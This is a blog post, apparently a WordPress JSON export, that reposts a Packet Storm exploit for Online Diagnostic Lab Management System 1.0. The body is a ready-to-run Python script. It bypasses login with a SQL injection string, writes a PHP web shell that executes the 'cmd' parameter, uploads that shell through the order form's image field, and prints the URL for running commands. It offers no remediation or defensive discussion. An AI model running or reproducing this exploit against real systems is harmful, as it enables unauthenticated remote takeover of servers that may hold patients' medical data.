{"id":31102,"date":"2022-09-26T20:39:13","date_gmt":"2022-09-26T17:39:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168498\/odlms10-sqlbypassshell.txt"},"modified":"2022-09-28T15:09:18","modified_gmt":"2022-09-28T11:39:18","slug":"online-diagnostic-lab-management-system-1-0-sql-injection-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-diagnostic-lab-management-system-1-0-sql-injection-shell-upload\/","title":{"rendered":"Online Diagnostic Lab Management System 1.0 SQL Injection \/ Shell Upload"},"content":{"rendered":"

# Exploit Title: Online Diagnostic Lab Management System – Remote Code Execution (RCE) (Unauthenticated)
\n# Google Dork: N\/A
\n# Date: 2022-9-23
\n# Exploit Author: yousef alraddadi – https:\/\/twitter.com\/y0usef_11
\n# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15667\/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
\n# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/mayuri_k\/diagnostic_0.zip
\n# Tested on: windows 11 – XAMPP
\n# CVE : N\/A
\n# Version: 1.0
\n# Authentication Required: bypass login with sql injection<\/p>\n

#\/usr\/bin\/python3<\/p>\n

import requests
\nimport os
\nimport sys
\nimport time
\nimport random<\/p>\n

# clean screen
\nos.system(“cls”)
\nos.system(“clear”)<\/p>\n

logo = ”’
\n##################################################################
\n# #
\n# Exploit Script ( Online Diagnostic Lab Management System ) #
\n# #
\n##################################################################
\n”’
\nprint(logo)<\/p>\n

url = str(input(“Enter website url : “))
\nusername = (“‘ OR 1=1– -“)
\npassword = (“test”)<\/p>\n

req = requests.Session()<\/p>\n

target = url+”\/diagnostic\/login.php”
\ndata = {‘username’:username,’password’:password}<\/p>\n

website = req.post(target,data=data)
\nfiles = open(“rev.php”,”w”)
\npayload = “<?php system($_GET[‘cmd’]);?>”
\nfiles.write(payload)
\nfiles.close()<\/p>\n

hash = random.getrandbits(128)
\nname_file = str(hash)+”.php”
\nif “Login Successfully” in website.text:<\/p>\n

print(“[+] Login Successfully”)
\nwebsite_1 = url+”\/diagnostic\/php_action\/createOrder.php”<\/p>\n

upload_file = {
\n“orderDate”: (None,””),
\n“clientName”: (None,””),
\n“clientContact” : (None,””),
\n“productName[]” : (None,””),
\n“rateValue[]” : (None,””),
\n“quantity[]” : (None,””),
\n“totalValue[]” : (None,””),
\n“subTotalValue” : (None,””),
\n“totalAmountValue” : (None,””),
\n“discount” : (None,””),
\n“grandTotalValue” : (None,””),
\n“gstn” : (None,””),
\n“vatValue” : (None,””),
\n“paid” : (None,””),
\n“dueValue” : (None,””),
\n“paymentType” : (None,””),
\n“paymentStatus” : (None,””),
\n“paymentPlace” : (None,””),
\n“productImage” : (name_file,open(“rev.php”,”rb”))
\n}<\/p>\n

up = req.post(website_1,files=upload_file)
\nprint(“[+] Check here file shell => “+url+”\/diagnostic\/assets\/myimages\/”+name_file)
\nprint(“[+] can exect command here => “+url+”\/diagnostic\/assets\/myimages\/”+name_file+”?cmd=whoami”)
\nelse:
\nprint(“[-] Check username or password”)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Online Diagnostic Lab Management System – Remote Code Execution (RCE) (Unauthenticated) # Google Dork: N\/A # Date: 2022-9-23 # Exploit Author: yousef alraddadi – https:\/\/twitter.com\/y0usef_11 # Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15667\/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html # Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/mayuri_k\/diagnostic_0.zip # Tested on: windows 11 – XAMPP # CVE : N\/A # Version: 1.0 # Authentication Required: bypass login …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31102","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31102","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31102"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31102\/revisions"}],"predecessor-version":[{"id":31212,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31102\/revisions\/31212"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}